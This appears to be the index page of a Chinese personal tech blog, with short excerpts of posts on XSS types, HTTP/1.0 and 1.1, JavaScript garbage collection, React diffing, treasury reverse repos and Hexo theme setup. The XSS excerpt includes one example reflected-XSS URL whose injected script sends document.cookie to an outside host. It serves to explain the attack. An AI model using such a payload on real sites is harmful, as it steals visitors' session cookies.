elliot's blog

XSS 跨站脚本攻击存储型XSS：存储型XSS，持久化，代码是存储在服务器中的，如在个人信息或发表文章等地方，插入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，用户访问该页面的时候触发代码执行。这种XSS比较危险，容易造成蠕虫，盗窃cookie 反射型XSS：非持久化，需要欺骗用户自己去点击链接才能触发XSS代码（服务器中没有这样的页面和内容），一般容易出现在搜索页面。反射型XSS大多数是用来盗取用户的Cookie信息。 DOM型XSS：不经过后端，DOM-XSS漏洞是基于文档对象模型(Document Object Model,DOM)的一种漏洞，DOM-XSS是通过url传入参数去控制触发的，其实也属于反射型XSS。 Reflected XSS（基于反射的XSS攻击）主要通过利用系统反馈行为漏洞，并欺骗用户主动触发，从而发起Web攻击。 1http://you.163.com/search?keyword=<script>document.location='http://xss.com/get?cookie='+document.c ...

HTTP1.0 HTTP/1.0是无状态、无连接的应用层协议 每一次请求都需要建立一个TCP链接，服务器处理完之后立即断开连接 通过cookie/session等进行身份认证 HTTP1.0 存在问题无法复用每次发送请求，都需要进行一次tcp连接，tcp的连接释放过程比较费时,使得网络利用率较低 HTTP1.1继承自1.0 比较简单 克服了1.0部分问题 长连接新增Connection字段， 通过设置为keep-alive保持tcp通道的不中断 管道传输只要第一个请求发出去了，不必等其回来，就可以发第二个请求出去，可以减少整体的响应时间。 HTTP1.1缺陷 请求/响应头部未经压缩发送，头部信息越多延迟越大，只能压缩body部分 冗长的头部，每次发送相同的头部会造成较多浪费 队头阻塞： 服务器按照请求顺序进行响应，如果服务器响应慢，会导致客户端一直无法请求到数据 没有请求优先级控制 请求只能从客户端到服务端，服务端只能被动接受 带宽利用率不高 tcp慢启动，tcp通道建立后会先慢慢传输数据，之后逐步加快传输· 多条tcp通道会竞争带宽 造成不必要的损失 ...

performance0 参考文件： https://juejin.cn/post/7038593947995734030#heading-4 https://juejin.cn/post/6981588276356317214#heading-17 垃圾回收机制 计数清除 变量进行声明和赋值之后，值引用数+1 同一个值被赋值给另外一个变量后，值引用数+1 保存该应用值变量被覆盖/被删除后计数-1 计数为-0的可以清除 标记清除/整理 将堆内存中所有变量打上标记 从根对象进行遍历，把还在上下文中使用的变量清除标记 清理所有还有标记的变量， 垃圾回收程序清理 整理是将所有没有标记的变量向内存的一侧移动，移动完毕后剩余内存清空 v8 新旧生代 ​ 新生代存放的是小且活跃的变量，旧生代中存放大变量或不活跃的变量 Scavenge 868 208 1076 6 143

React diff 同级元素进行diff，如果一个dom结果在前后两次更新中跨越了层级，则不复用 不同类型的元素生成不同的树，如果元素变了，则后续节点都会销毁 通过key值暗示哪些能保持稳定

小白入门国债逆回购正回购方(资金融入方)在将债券出质给逆回购方(资金融出方)融入资金的同时，双方约定在将来某一指定日期，由正回购方按约定回购利率计算的资金额向逆回购方返回资金，逆回购方向正回购方返回原出质债券的融资行为。 通俗来说，有资金的一方（逆回购方）将钱融给需要资金的一方（正回购方，他需要质押债券才可以融资），到期向正回购方收取一定的利息。 在月末，季末，长假之前，收益率有可能会大幅提高

新建文章1hexo new [layout] <titie> 布局 路径 post source/_posts page source draft source/_drafts 参数 描述 -p –path 自定义新文章路径 -r –replace 如果存在同名文章，将其替换 -s –slug 文章的 Slug，作为新文章的文件名和发布后的 URL 新建文件默认地址： 2024/03/18/hexo入门/permalink：2024/03/18/hexo入门/ butterfly添加自定义js、css文件推荐在根目录的source文件夹种配置，通过配置文件将 123456# _config.butterfly.yml inject: head: # - <link rel="stylesheet" href="/xxx.css"> bottom: - < ...